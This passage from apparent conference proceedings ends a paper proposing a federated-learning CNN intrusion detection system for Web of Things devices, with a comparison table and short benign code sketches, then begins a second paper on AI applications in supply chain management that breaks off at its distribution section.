malicious IoT traffic as well as different types of anomalies. The deep learning approach has been enriched with an appropriate hyperparameter optimization phase, a feature reduction phase using an autoencoding neural network, and a robustness study of the best deep neural networks considered in situations affected by Gaussian noise on some of the considered features. The obtained results demonstrate the effectiveness of the created IoT dataset for anomaly detection using deep learning techniques, even in a noisy scenario. Ullah et al. [10] design and develop an anomaly-based intrusion detection model for IoT networks. First, a convolutional neural network model is used to create a multiclass classification model. The proposed model is then implemented using 1D, 2D and 3D convolutional neural networks. The proposed convolutional neural network model is validated using the BoT-IoT, IoT Network Intrusion, MQTT-IoT-IDS2020 and IoT-23 intrusion detection datasets. Transfer learning is used to implement binary and multiclass classification using a pre-trained multiclass convolutional neural network model. A comparison is made between the proposed binary and multiclass classification models and existing deep learning implementations in terms of accuracy, precision, recall and F1 score. Mustafizur Rahman Shahid [11] develops an IoT NIDS based on unsupervised learning, specifically anomaly detection algorithms, which allows his model to detect new types of attacks. He also explores two different situations, depending on whether it is possible to know which device is generating the network traffic. For this purpose, he proposes to detect anomalous communications in IoT networks using a set of sparse autoencoders, unsupervised neural networks that can be used for anomaly detection, thereby allowing the detection of new types of attacks. Khalid Aldriwish [12] proposes an IoT security architecture based on a deep learning approach to detect malware across the IoT network. The malware model is based on Deep Convolutional Neural Networks (DCNNs). TensorFlow Deep Neural Networks (TFDNNs) are introduced to detect software piracy threats based on source code plagiarism. The investigation is conducted on the Google Code Jam (GCJ) dataset. Susilo et al. [13] developed an algorithm to detect denial of service (DoS) attacks using a deep learning algorithm. They used the Python programming language with packages such as scikit-learn, TensorFlow and Seaborn. They found that a deep learning model could increase accuracy, making the mitigation of attacks occurring on an IoT network as effective as possible. Kim et al. [14] developed a framework based on ML and DL to detect IoT botnet attacks and then used it to detect botnet attacks targeting various IoT devices. Their framework consists of the N-BaIoT botnet dataset, a botnet training model, and a botnet detection model. Alotaibi et al. [15] propose a deep learning method to detect malicious traffic data, especially malicious attacks targeting IoT devices. The proposed stacked deep learning method is bundled with five pre-trained residual networks (ResNets) to deeply learn the characteristics of suspicious activities and distinguish them from normal traffic. Each pre-trained ResNet model is composed of
10 residual blocks. They used two large datasets to evaluate the performance of their detection method and investigated two heterogeneous IoT environments to make their approach deployable in any IoT environment. The proposed method has the ability to distinguish benign from malicious traffic data and to detect most IoT attacks. Xiao et al. [16] propose a novel behavior-based deep learning framework (BDLF) built on a cloud platform to detect malware in an IoT environment. In the proposed BDLF, they first construct behavior graphs to provide efficient information about malware behaviors using extracted API calls. They then use stacked autoencoders (SAEs), a type of neural network, to extract high-level features from the behavior graphs. The layers of the SAEs are stacked one after another and the last layer is connected to added classifiers. The architecture of the SAEs is 6,000-2,000-500. The experimental results show that the proposed BDLF can learn the semantics of high-level malicious behaviors from the behavior graphs and increase the average detection accuracy by 1.5%. Sagduyu et al. [17] present new techniques based on adversarial machine learning and apply them to three types of over-the-air (OTA) wireless attacks, namely the jamming denial-of-service (DoS) attack, the spectrum poisoning attack, and the priority violation attack. They show that these attacks, with different levels of energy consumption and stealth, result in a significant loss of throughput and success rate in wireless communications for IoT systems. They then introduce a defense mechanism that systematically increases the adversary's uncertainty at the inference stage and improves performance. The results provide new insights into how to attack and defend IoT networks using deep learning. Dawoud et al. [18] propose a secure framework for IoT based on SDN. The framework is a generalization of the integration of SDN and IoT. They focus on massive IoT deployments, e.g., smart city applications, where security is critical and network traffic is huge. The study looks at the SDN architecture from a security perspective, and they deploy a deep learning (DL) based intrusion detection system whose detection module uses Restricted Boltzmann Machines (RBM). The precision rate shows significant improvements over standard ML techniques, e.g. SVM and PCA. Fatani et al. [19] propose an efficient AI-based mechanism for intrusion detection systems (IDS) in IoT systems. They exploit advances in deep learning and metaheuristic (MH) algorithms, which have proved their effectiveness in solving complex engineering problems. They propose a feature extraction method using convolutional neural networks (CNNs) to extract relevant features. They also develop a feature selection method using a variant of the transient search optimization (TSO) algorithm, called TSODE, which uses the operators of the differential evolution (DE) algorithm. The proposed TSODE uses differential evolution to improve the balance between the exploitation and exploration phases. In addition, they use four public datasets, KDDCup-99, NSL-KDD, BoT-IoT, and CICIDS-2017, to evaluate the performance of the developed method.

In the table below we compare the related work approaches in terms of the following statistical parameters:
– Accuracy: represents the overall performance of a system; a high accuracy value means that the system is working properly.
– Recall: indicates the sensitivity of the system; if the recall value is high, the system is sensitive to the labeled items and identifies them correctly.
– Precision: indicates how accurately a system identifies legitimate and malicious packets; the higher the precision, the greater the likelihood that the system is working correctly.
– F1-Score: a measure of the global performance of the system (Table 1).
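For reference, these metrics are computed from the confusion-matrix counts (true positives TP, true negatives TN, false positives FP and false negatives FN). The formulas below are the standard definitions and are not taken from any particular surveyed paper:

```latex
\mathrm{Accuracy}  = \frac{TP + TN}{TP + TN + FP + FN}, \qquad
\mathrm{Recall}    = \frac{TP}{TP + FN}, \qquad
\mathrm{Precision} = \frac{TP}{TP + FP}, \qquad
F_1 = \frac{2 \cdot \mathrm{Precision} \cdot \mathrm{Recall}}{\mathrm{Precision} + \mathrm{Recall}}
```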

Table 1. Comparative analysis of existing IDS for IoT & WoT.

| Paper | Technique | Dataset | Accuracy | Recall | Precision | F1-score |
|-------|-----------|---------|----------|--------|-----------|----------|
| [5] | DNN | KDDCUP99 | 99.73% | 97% | 96% | 97% |
| [6] | Deep autoencoder model | Bot-IoT | 99.7% | 99% | 99% | N/A |
| [7] | Probabilistic hybrid ensemble classifier (PHEC) adapted to a federated learning framework | NSL-KDD | 83.78% | N/A | 83.92% | N/A |
|     |  | DS2OS traffic traces | 98.27% | N/A | 61.5% | 75.49% |
|     |  | Gas pipeline dataset | 98.47% | N/A | 98.99% | 98.22% |
|     |  | Water tank dataset | 93.74% | N/A | 82.34% | 89.24% |
| [8] | Federated deep learning with RNN | Bot-IoT | 96.76% | 97% | 95% | 96% |
|     |  | MQTTset | 89.29% | 89% | 90% | 90% |
|     |  | TON_IoT | 99.98% | 100% | 100% | 100% |
|     | Federated deep learning with CNN | Bot-IoT | 96.02% | 93% | 97% | 95% |
|     |  | MQTTset | 89.77% | 89% | 90% | 90% |
|     |  | TON_IoT | 98.87% | 100% | 100% | 100% |
|     | Federated deep learning with DNN | Bot-IoT | 95.76% | 96% | 94% | 95% |
|     |  | MQTTset | 90.06% | 89% | 91% | 90% |
|     |  | TON_IoT | 99.68% | 100% | 100% | 100% |
| [9] | DNN + autoencoding neural network | NSL-KDD | 99.89% | N/A | N/A | N/A |
| [10] | CNN | BoT-IoT | 99.97% | 99.95% | 99.95% | 99.95% |
|      |  | IoT Network Intrusion | 97.76% | 97.8% | 97.76% | 97.78% |
|      |  | MQTT-IoT-IDS2020 | 99.93% | 99.92% | 99.93% | 99.92% |
|      |  | IoT-23 intrusion detection | 99.96% | 99.97% | 99.96% | 99.96% |
| [11] | Unsupervised learning algorithms (autoencoders) | N/A | N/A | N/A | N/A | N/A |
| [12] | DCNN, TFDNN | Google Code Jam (GCJ) dataset | 98.12% | 97.88% | 98.02% | N/A |
| [13] | Random Forest (RF), CNN, Multilayer Perceptron (MLP) | BoT-IoT | 91.15% | N/A | N/A | N/A |
| [14] | CNN, RNN, LSTM | N-BaIoT | N/A | N/A | N/A | 91% |
| [15] | Stacked deep learning | N-BaIoT, power system dataset | 97.9% | N/A | N/A | N/A |
| [16] | Behavior-based deep learning framework (BDLF) with stacked autoencoders (SAEs) | N/A | N/A | 99.2% | 98.6% | 98.9% |
| [17] | Adversarial deep learning | N/A | N/A | N/A | N/A | N/A |
| [18] | RBM | KDD99 | 94% | N/A | 94% | N/A |
| [19] | CNN + TSODE feature selection | KDDCup-99 | 82.783% | 85.79% | 84.640% | 83.10% |
|      |  | NSL-KDD | 66.092% | 69.10% | 68.913% | 61.94% |
|      |  | BoT-IoT | 98.942% | 98.97% | 98.941% | 98.94% |
|      |  | CICIDS-2017 | 99.750% | 99.10% | 99.320% | 99.48% |

3 Proposed Work

The CNN has the capability to automatically learn better features and categorize traffic [20]. In addition, it can perform better classification and learn additional features with more traffic data, as it shares the same convolution matrix (kernel), which significantly reduces the number of parameters and the amount of learning computation. This allows the CNN to quickly recognize the nature of attacks, unlike other ML or DL algorithms that may overfit on massive data. Furthermore, CNNs have been reported to perform better than other algorithms in the field of intrusion detection. The core concept of federated learning is to create machine learning models that are built on distributed datasets across different devices while avoiding the leakage of data [8]. Specifically, federated learning is a technique in which the current model is downloaded and an updated model is computed on IoT devices using the local IoT data. These locally trained models are then returned from the IoT devices to the central server for aggregation (e.g., the weights are averaged), and a combined and enhanced single global model is then returned to the IoT devices. The distribution of data is important in terms of federated learning deployment and the associated practical and technical challenges.
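As an illustration of the type of CNN referred to here, the sketch below builds a small 1D convolutional classifier over pre-processed traffic feature vectors with Keras. It is only a minimal example under assumed settings; the layer sizes and the placeholders n_features and n_classes are not taken from this paper's experiments:

```python
# Minimal 1D-CNN sketch for classifying network-flow feature vectors.
# n_features and n_classes are placeholders for the dataset at hand.
import tensorflow as tf

def build_cnn(n_features: int, n_classes: int) -> tf.keras.Model:
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(n_features, 1)),                  # one flow = one 1-D feature vector
        tf.keras.layers.Conv1D(32, kernel_size=3, activation="relu"),  # shared kernels keep parameter counts low
        tf.keras.layers.MaxPooling1D(pool_size=2),
        tf.keras.layers.Conv1D(64, kernel_size=3, activation="relu"),
        tf.keras.layers.GlobalMaxPooling1D(),
        tf.keras.layers.Dense(64, activation="relu"),
        tf.keras.layers.Dense(n_classes, activation="softmax"),        # benign + attack classes
    ])
    model.compile(optimizer="adam",
                  loss="sparse_categorical_crossentropy",
                  metrics=["accuracy"])
    return model
```

In the federated setting described next, each device would train such a model locally and only its weights would leave the device.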

In the following, we present our solution, which is based on four steps:

1. Every device trains the generic model with its local private data;
2. Every device uploads its local model parameters;
3. The server aggregates all local models to obtain the global model;
4. Every device downloads the global model.

We train a deep federated learning-based IDS model for cyber attack detection in WoT. In each device, a CNN-based model is trained on a local dataset. These trained models are then aggregated in a central server, and each device then downloads the global model, see Fig. 2.

Fig. 2. Proposed architecture.
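The server-side aggregation (step 3) can be as simple as a weighted average of the uploaded parameters, in the spirit of FedAvg. The sketch below is only a minimal illustration of this step; the function and variable names are assumptions made for the example:

```python
# FedAvg-style aggregation sketch: average per-layer parameters uploaded by
# the devices, weighted by the size of each device's local dataset.
import numpy as np

def aggregate(local_weights, local_sizes):
    """local_weights: one list of per-layer arrays per device (e.g. model.get_weights())."""
    total = float(sum(local_sizes))
    return [
        sum(w[layer] * (n / total) for w, n in zip(local_weights, local_sizes))
        for layer in range(len(local_weights[0]))
    ]

# Toy usage with two devices and a two-layer model (arrays stand in for real weights).
device_a = [np.ones((3, 3)), np.zeros(3)]
device_b = [np.zeros((3, 3)), np.ones(3)]
global_weights = aggregate([device_a, device_b], local_sizes=[100, 300])
# global_weights[0] is 0.25 everywhere and global_weights[1] is 0.75 everywhere,
# reflecting the 1:3 ratio of local dataset sizes.
```

Each device would then load the resulting global weights into its local model (step 4) before the next round of local training.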

According to literature reviews, the federated approach has proven to be sufficient in terms of data security, as devices can train their models with their own data, thus avoiding sharing private data over the Internet. Furthermore, by using the CNN technique as a deep learning model, we expect to obtain a powerful model. In future work, we will train our model with different datasets and compare it with other methods.

4 Conclusion

The WoT provides the environment through which each IoT device can connect to other IoT devices via the Internet, but along with the benefits of global service and data exchange, it has some limitations. As it manipulates users' personal and private information, it presents various attack vectors, and with low-power and low-memory IoT devices, it is difficult to counter these cyber-attacks. In this context, we provide a security model based on federated learning and CNN. In future work, we aim to train and test our model on different datasets in order to evaluate its capabilities.

References 1. Web of Things (WoT) Architecture. https://www.w3.org/TR/wot-architecture/. Accessed 14 Apr 2022 2. Faheem, M.R., Anees, T., Hussain, M.: The web of things: findability taxonomy and challenges. IEEE Access 7, 185:028–185:041 (2019) 3. Guinard, D.D., Trifa, V.M.: Building the web of things (2017) 4. Tsimenidis, S., Lagkas, T., Rantos, K.: Deep Learning in IoT Intrusion Detection. J. Netw. Syst. Manag. 30(1), 1–40 (2021). https://doi.org/10.1007/s10922-02109621-9 5. Akshat, G., Gupta, B., Ching-Hsien, H., Dragan, P., Francisco, J.: Deep learning based approach for secure Web of Things (WoT). In: IEEE International Conference on Communications Workshops (ICC Workshops) (2021). https://doi.org/10. 1109/ICCWorkshops50388.2021.9473677 6. Apostol, I., Preda, M., Nila, C., Bica, I.: IoT botnet anomaly detection using unsupervised deep learning. Electronics 10, 1876 (2021). https://doi.org/10.3390/ electronics10161876 7. Chatterjee, S., Manjesh, K.: Federated learning for intrusion detection in IoT security: a hybrid ensemble approach (2021) 8. Ferrag, M., Friha, O., Maglaras, L., Janicke, H., Shu, L.: Federated deep learning for cyber security in the internet of things: concepts, applications, and experimental analysis. IEEE Access (2021). https://doi.org/10.1109/access.2021.3118642 9. Aversano, L., Bernardi, M., Cimitile, M., Pecori, R., Veltri, L.: Effective anomaly detection using deep learning in IoT systems. Hindawi Wirel. Commun. Mob. Comput. 2021, Article ID 9054336, 14 (2021). https://doi.org/10.1155/2021/9054336 10. Ullah, I., Qusay, H.: Design and development of a deep learning-based model for anomaly detection in IoT networks. IEEE Access (2021). https://doi.org/10.1109/ access.2021.3094024 11. Shahid, M.: Deep learning for internet of things (IoT) network security. A thesis submitted in partial fulfillment of the requirements for the degree of Doctor of Philosophy. Telecom SudParis Institut Polytechnique de Paris, France, March 2021 12. Aldriwish, K.: A deep learning approach for malware and software piracy threat detection. Eng. Technol. Appl. Sci. Res. 11(6), 7757–7762 (2021). https://doi.org/ 10.48084/etasr.4412 13. Susilo, B., Sari, R.: Intrusion detection in IoT networks using deep learning algorithm. Information (Switzerland) Published by MDPI. Information 11, 279 (2020). https://doi.org/10.3390/info11050279

14. Kim, J., Shim, M., Hong, S., Shin, Y., Choi, E.: Intelligent detection of IoT botnets using machine learning and deep learning. Appl. Sci. Published by MDPI. 10, 7009 (2020). https://doi.org/10.3390/app10197009 15. Alotaibi, B., Alotaibi, M.: A stacked deep learning approach for IoT cyberattack detection. Hindawi J. Sens. 2020, Article ID 8828591, 10 p. (2020). https://doi. org/10.1155/2020/8828591 16. Xiao, F., Lin, Z., Sun, Y., Ma, Y.: Malware detection based on deep learning of behavior graphs. Hindawi Math. Probl. Eng. 2019, Article ID 8195395, 10 p. (2019). https://doi.org/10.1155/2019/8195395 17. Sagduyu, Y., Shi, Y., Erpek, T.: IoT network security from the perspective of adversarial deep learning. In: 16th Annual IEEE International Conference on Sensing, Communication, and Networking (SECON) (2019). https://doi.org/10.1109/ SAHCN.2019.8824956 18. Dawoud, A.: Deep learning and software-defined networks: towards secure IoT architecture. Internet Things (2018). https://doi.org/10.1016/j.iot.2018.09.003 19. Fatani, A., Abdelaziz, M., Dahou, A., Mohammed, A., Al-qaness, A., Lu, S.: IoT intrusion detection system using deep learning and enhanced transient search optimization (2016) 20. Idrissi, I., Azizi, M., Moussaoui, O.: IoT security with deep learning-based intrusion detection systems: a systematic literature review. In: 4th International Conference on Intelligent Computing in Data Sciences (ICDS) (2020). https://doi.org/ 10.1109/ICDS50568.2020.9268713

Artificial Intelligence Applications in the Global Supply Chain: Benefits and Challenges Ikram Lebhar1(B) , Afaf Dadda1 , and Latifa Ezzine2 1 ENSAM School of Engineering, Meknes, Morocco

[email protected], [email protected] 2 University Moulay Ismail, Meknes, Morocco

Abstract. Organizations are seeking to improve their management systems in a period of economic industrialization in which the environment is becoming increasingly competitive and widespread. In the industry 4.0 era, most businesses strive to be reactive and agile by incorporating new technologies such as artificial intelligence (AI) in supply chain management. Nowadays, Supply chains (SC) differ from those of just a few decades ago, and they are evolving in a highly competitive economic system. Dynamic supply chain processes require a technology that can cope with their increasing complexities. Moreover, quality user stories, budget control, and a firm’s agility in the light of economic opportunities and uncertainties are all dependent on supply chains. The only way of increasing operational efficiency is to use the right technology at the right time. In recent years, several functional supply chain applications based on artificial intelligence (AI) have emerged. Artificial intelligence has the potential to significantly improve the performance of the overall economy. However, it could have a greater influence by serving as a method of invention that can revolutionize the nature of the process of innovation in SC and R&D institutions. The main purpose of this paper is to identify the critical role of AI technology in providing greater flexibility and control to supply chain processes, and also to bring light to SC reaction between its benefits and challenges. Keywords: Artificial intelligence (AI) · New technologies · Supply chain management (SCM)

1 Introduction
Supply chains are critical to providing high-quality customer experiences, controlling costs, and maintaining a company's agility in the face of market opportunities and unpredictability. Firms strive for speed, dependability, and traceability while considering cost obligations, time constraints, and inventory optimization [1]. According to Mentzer [2], “a supply chain is the network of organizations that are involved, through upstream and downstream linkages, in the different processes and activities that produce value in the form of products and services delivered to the ultimate consumer.” Supervision, forecasting, and optimization are required to create more
agile and resilient processes and activities and to perform properly in the challenging situations of the supply chain. Therefore, AI enables users to identify patterns in the supply chain and integrate predictive perspectives that permit faster assessment and more appropriate mitigation of disruptive events that may occur across the supply chain. AI can easily recognize relevant SC data, allowing managers to improve models that help in understanding how each system operates and identify opportunities for improvement [3]. It also enables systems to make resourceful decisions and execute tasks automatically without human intervention. This paper reports a research project that aims to address the following questions: How can artificial intelligence help with global supply chain issues? What are the risks and challenges that companies could face in this digital transformation? First of all, we define AI and trace its evolution from the past to the present and the future. Secondly, we examine the applications of AI in supply chain management, from demand forecasting to distribution, to give the paper in-depth detail. Then, we move to the risks and negative effects that AI could have in the industrial field. The paper concludes by suggesting opportunities and new ideas for future research.

2 Understanding of Artificial Intelligence Technology

2.1 Definition and History
Artificial intelligence is the science of making computers perform smart tasks that previously only humans could perform [4]. It has advanced rapidly in the last decade, and it has altered people's beliefs and lifestyles. Technological innovation is becoming a key strategic development approach for countries all over the world, in order to improve competitiveness and ensure security. To lead in a new round of global competition, several countries have introduced incentive programs and enhanced the implementation of innovative aspects and abilities. AI has emerged as a research focal point in science and engineering; huge organizations such as Microsoft, Siemens, and Google are investing in AI and adapting it to an increasing number of fields [8]. AI has a long history, dating back several decades to when scientists debated whether artificial creatures, manufactured men, and other autonomous systems existed or might exist in some form [5]. It became more real as a result of early researchers during the 1700s and even beyond, when thinkers pondered how smart robots might artificially automate and manipulate human thought. The mental processes that sparked interest in AI began when ancient mathematicians, philosophers, statisticians, and theorists investigated the mechanical manipulation of symbols, likely contributing to the 1940s invention of the programmable digital computer, the “Atanasoff Berry Computer” (ABC). This particular innovation sparked experts' interest in developing a new idea, the “electronic brain”. It took nearly a decade before these early contributions shaped the comprehension of the field as we know it today. Alan Turing, a mathematician, suggested a test that examined a machine's capacity to reproduce human activities to the point that they were
unrecognizable from human action. Later that century, during a summer conference at Dartmouth College in the mid-1950s, John McCarthy, the computer and cognitive researcher, coined the term “artificial intelligence” [6]. Many experts, logicians, and programmers contributed to the current interpretation of artificial intelligence as a whole from the 1950s onward [5, 7]. Every new decade brought discoveries and inventions that altered people's basic understanding of the area of artificial intelligence and showed how previous achievements have pushed AI from an impossible ideal to a reality for coming generations. Over the last 60 years, artificial intelligence has undergone a long improvement process. Its evolution can be divided into different phases:
– Native Algorithms: the building blocks of artificial intelligence, referring to a set of rules or instructions that computers can follow.
– Machine Learning: “algorithms that can learn from data without relying on rules-based programming” (McKinsey & Co.).
– Deep Learning: a type of machine learning that involves the deployment of a pre-programmed artificial neural network.
– Deep Reinforcement Learning: a branch of machine learning that involves training artificial intelligence models in a very specific way; it refers to methods that enable an agent to learn, on its own, which action to take in order to maximize its overall reward.
– Distributed Agents Artificial Intelligence: a branch of AI whose goal is to create decentralized systems, usually multi-agent systems, that can cooperate and coordinate (Fig. 1).

Fig. 1. AI evolution from native algorithms to distributed agents

2.2 Enabling Drivers and Technologies of Artificial Intelligence
There are numerous Artificial Intelligence-related technologies and subfields, each with its own branch of engineering and scientific study. The most relevant concepts are as follows:

2.2.1 Natural Language Processing (NLP)
NLP is a branch closely related to the linguistic domain; the objective is to determine what the operator means when he makes a command, asks a question, or states something, and what he wants to achieve [9]. The robot is fully equipped with voice recognition and grammatical knowledge technology, which aims to optimize the algorithm through continuous learning, allowing the engine to hear, connect, and understand the accurate meaning and also the emotions [10].

2.2.2 Deep Learning
Deep learning is an AI subfield that employs massive neural networks with many layers of blocks to learn complicated patterns in huge amounts of data [11], taking advantage of advances in computing power and improved training methods. Image and speech recognition are two common applications.

2.2.3 Robotics
Robotics is the field of study concerned with the architecture, production, and use of robots. It focuses on the relationship between human-robot interaction and object manufacturing. Robots were originally made to accomplish repetitive tasks (such as assembling automobiles on an assembly line), but they have since evolved to complete tasks as complex as surgery [12]. Every robot has a different level of independence, ranging from completely autonomous bots that take actions with no external influence to human-controlled bots that perform functions over which a human has complete control.

2.2.4 Machine Learning
Within artificial intelligence, machine learning is the practice that attempts to guide a system to gain knowledge and connect data in the same way that a human might. ML is based on the use of algorithms that improve their effectiveness by gathering and analyzing data [13]. Projection, cluster analysis, categorization, and dimension reduction are the major kinds of problems that machine learning is used to solve [14].

2.2.5 Computer Vision
Computer vision aims to enable computers to recognize and understand visual input in the same way that humans do. It primarily relies on algorithms to detect and examine images and data. Face and image detection are the most widely used computer vision applications [15].

2.2.6 Big Data
Big Data can be defined as a prerequisite for AI: a large volume of data improves recognition rates and accuracy. Having a large amount of structured data makes the data more comprehensive and sufficient to support the development of AI, as it is critical for achieving goals in machine learning and also in Business Intelligence analysis [16, 17].

3 Benefits of Artificial Intelligence in Supply Chain Management
Optimal and effective supply chain coordination is achievable if business units come together to accomplish it. Nevertheless, several obstacles stand in the way of significant progress in this area. Supply chain models have four key qualities on which AI can act: optimization, prediction, modeling/simulation and decision-making assistance. Each of these characteristics can be enhanced using artificial intelligence techniques. The global supply chain's machines, robots, IoT devices, and applications generate a flood of data from multiple sources. As a result, advanced artificial intelligence (AI) and machine learning have emerged, aimed at making sense of all this data and turning it into insights that help the industry. AI-powered supply chain technologies bring the problem of all this data under control. The advantages of using AI to analyze complex operational data are evident: better supply chain accessibility, increased flexibility, shorter cycle times, forecasting based on big data analysis, quality improvements, higher efficiency, faster decision-making, increased supply chain resilience, and the ability to turn processes derived from real insights into application performance (Fig. 2).

3.1 Artificial Intelligence and Forecast Demand Optimization
Artificial intelligence has been used successfully in demand forecasting, and this represents one of the most promising applications of AI in supply chains. Firms are currently striving to strike a balance between supply and demand. As a result, a more accurate prediction for the supply chain and manufacturing is required. AI can process, analyze, automate, and predict data; it can consequently provide consistent and accurate demand forecasting, allowing organizations to better manage their procurement in terms of purchases and order processing, lowering costs associated with transportation, inventory, and other areas. The performance of AI for demand forecasting leads to significant supply chain benefits:
– Machine learning algorithms look at historical data, learn, and develop increasingly accurate predictions over time.
– Customer satisfaction suffers when there are stockouts, but it is higher when the product is available at any time; using AI in demand forecasting improves customer loyalty and brand perception.
– For retail companies, cash tied up in stock is a regular scenario: some products remain unsold for longer than envisaged. This situation results in higher-than-expected inventory expenses, as well as an increased chance that these goods would be sold off or become obsolete and lose their value. Such circumstances can be avoided with precise demand forecasting.
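As a purely illustrative sketch of this kind of forecasting pipeline, the example below derives lag features from a weekly sales history and fits an off-the-shelf regressor. The column names ('sales', 'price', 'temperature') and the choice of model are assumptions made for the example, not a reference implementation:

```python
# Hypothetical demand-forecasting sketch: lagged sales plus external variables
# (price, weather) feed a regressor that predicts the coming week's demand.
import pandas as pd
from sklearn.ensemble import RandomForestRegressor

def train_forecaster(history: pd.DataFrame) -> RandomForestRegressor:
    """history: weekly rows with 'sales', 'price' and 'temperature' columns."""
    df = history.copy()
    df["sales_lag_1"] = df["sales"].shift(1)   # last week's demand
    df["sales_lag_4"] = df["sales"].shift(4)   # same week one month ago
    df = df.dropna()
    features = df[["sales_lag_1", "sales_lag_4", "price", "temperature"]]
    target = df["sales"]
    model = RandomForestRegressor(n_estimators=200, random_state=0)
    model.fit(features, target)
    return model
```

In practice, such a model would be retrained as new sales data arrive, which is how the forecasts improve over time as described above.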

Fig. 2. Integration success factors of AI in SCM

Accurate forecasts allow employees to focus on key strategic concerns instead of firefighting to manage unpredictable demand fluctuations by increasing or reducing inventories and headcount. AI and machine learning technologies use near-real-time data on variables including marketing campaigns, prices, and local weather forecasts in addition to historical sales data and the supply chain setup [18]. Otto, a German online retailer, was able to minimize its inventories by 90% using this technology [19]. AI is also being
employed in R&D departments to swiftly determine whether a model is likely to succeed or fail in the market and, if so, for what reasons. Moreover, it produces more modern systems by removing waste from the design process. AI has played a significant role in demand forecasting and in smart manufacturing in general [20].

3.2 Artificial Intelligence Between Manufacturing and Smart Manufacturing
AI has played a vital role in manufacturing, since it optimizes assets and processes, develops the best teams (humans and robots), increases quality and dependability, and reduces downtime for maintenance. Robotics, among the most evolved disciplines of AI, has become increasingly important in manufacturing [18]. Innovations in pattern recognition and semantic segmentation systems have revolutionized robot behavior, especially in terms of how robots recognize the qualities of the materials and objects with which they interact. Innovative camera-equipped, AI-enhanced robots have been equipped to identify empty shelf space, which results in a significant edge over traditional methods for choosing items [21]. In logistics, artificial intelligence unsupervised learning engines for dynamics enable robots to incorporate disturbances into their movement patterns. This intelligent control enables more precise fixes and an overall increase in process resilience [22]. In addition, because of the current format of the digital factory, it is necessary to construct smart factories in order to modernize the manufacturing industry. Smart factories use a combination of physical and cyber technology to extensively link previously independent, distinct processes, making the technologies involved more complicated and accurate than they are presently [23]. The impact of Artificial Intelligence (AI) on smart manufacturing is quickly growing. AI-based web applications allow users to create and publish live code, computations, graphics, and explanatory text documents, and they also support data cleaning and conversion, simulation analysis, mathematical modeling, machine learning, and many other technologies. Siemens' industry is a prime example of smart manufacturing. Electronics businesses can handle the constraints of Industry 4.0 using smart manufacturing. Physical prototypes, disconnected systems, paper-based work instructions, and information silos are all eliminated by Siemens solutions, which allow a continuous flow from research to implementation and beyond [24], resulting in improved industrial processes at both particular sites and global entities. Through a digital factory that simulates the production line, the operator controls and manages the manufacturing of programmable logic circuits. Products interact with the robots that produce them via barcodes, and the robots communicate with one another to refill parts and detect errors [21]. In brief, artificial intelligence has reduced manufacturing costs, reduced waste, and accelerated time to market [25]. It has been proven that the use of collaborative intelligent machines, machine learning algorithms, and self-driving trucks can minimize warehousing costs and improve inventory levels. Moreover, collaborative agility is a crucial element of AI-enabled production in a smart factory. Agile new ways of working are being implemented in projects using new exponential technologies to develop more advanced capabilities such as self-service business intelligence or predictive analytics
based on machine learning and automation [26]. Intelligent, agile robots are now collaborating with people to mass-produce products, which is critical for customer-centric businesses. AI has assisted factories all around the world in creating more interconnected and coordinated supply chains and value chains [27].

3.3 Artificial Intelligence and Warehousing
Despite the benefits of warehousing, the increasing demands and challenges it faces have made traditional warehousing operations unable to ensure the seamless and easy handling of the items and cargo held in it. As a result, warehouse operations must be altered. Several studies have been conducted to ensure the smooth operation of logistics systems, including the use of the Internet of Things, cloud computing, wireless sensor networks, RFID, tag readers, drones, robots, and artificial intelligence, among other things, to speed up processes in the warehouse, helping to ensure the effective storage and retrieval of products, as well as the warehouse's efficient functioning (Fig. 3).

Fig. 3. Warehouse incorporated functions

The automation of the above process in warehouse logistics employing the Internet of Things, artificial intelligence, sensor networks, and cloud computing could improve the quality of service by allowing them to avoid incorrect order placement and increase product handling performance. The magnetic sensor in the platform guarantees that the entire quantity of products loaded in the warehouse is accurate, the Rfid allows tag readers to define the nature of items received, and the barcode ensures that the commodities are diverse.

The intelligent machine first gets the output from sensors, tag readers and barcode scanners to identify the types of goods, and fully independent tuggers and forklifts load them onto the adequate shelves; the sensors fitted to each rack report the count over Wi-Fi to the nearest computer, supervised by laborers and the production plant, and also to the ThingSpeak cloud [28], which provides clients with information about stock availability. When a customer places an order for a specific type of product, the order and tracking numbers are provided to them and the customer's information is reported to the warehouse. The order information is sent to the robots, which determine which item should be retrieved [29]. A path plan is created via an optimization algorithm [30] to determine the fastest way to the rack once the type of product is identified. When the robot arrives at its destination, it picks up the requested items and sends the picked order number to the supervising operator over Wi-Fi, while sensors in the rack send the number of items left in the rack to a local computer, the cloud and the plant. As a result, the proposed approach informs customers about items in stock and out of stock, as well as the manufacturing unit about products in demand (Fig. 4).

Fig. 4. Warehouse proposed automated system
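As a toy illustration of the path-planning step only, the sketch below computes a shortest aisle path on a simplified grid map of the warehouse floor. It deliberately swaps the optimization algorithm cited in [30] (ant colony optimization) for plain breadth-first search to keep the example short, and the grid, start and goal positions are made-up values:

```python
# Toy stand-in for path planning: breadth-first search on a grid map of the
# warehouse floor (0 = free aisle, 1 = shelf block).
from collections import deque

def shortest_path(grid, start, goal):
    """Return a list of (row, col) cells from start to goal, or None if unreachable."""
    rows, cols = len(grid), len(grid[0])
    queue = deque([start])
    parent = {start: None}
    while queue:
        cell = queue.popleft()
        if cell == goal:
            path = []
            while cell is not None:          # walk back through parents
                path.append(cell)
                cell = parent[cell]
            return path[::-1]
        r, c = cell
        for nr, nc in ((r + 1, c), (r - 1, c), (r, c + 1), (r, c - 1)):
            if 0 <= nr < rows and 0 <= nc < cols and grid[nr][nc] == 0 \
                    and (nr, nc) not in parent:
                parent[(nr, nc)] = cell
                queue.append((nr, nc))
    return None

# Example: a 3x4 floor with one shelf block; robot at (0, 0), target rack at (2, 3).
floor = [[0, 0, 0, 0],
         [0, 1, 1, 0],
         [0, 0, 0, 0]]
print(shortest_path(floor, (0, 0), (2, 3)))
```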

After implementing the automated system in one of the leading companies of the food industry (based in Morocco), the results were as follows (Table 1):

Table 1. Gains after implementing the proposed solution

| Warehousing | Delay in procurement | Delay in dispatch | Committed errors | Inventory management (%) |
|---|---|---|---|---|
| Before implementing the solution | 3–4 h | 1–2 h | 60% | 80% |
| After implementing the automated system | 35–40 min | 15–25 min | 10% (because of network issues) | 100% |

3.4 Artificial Intelligence and Distribution
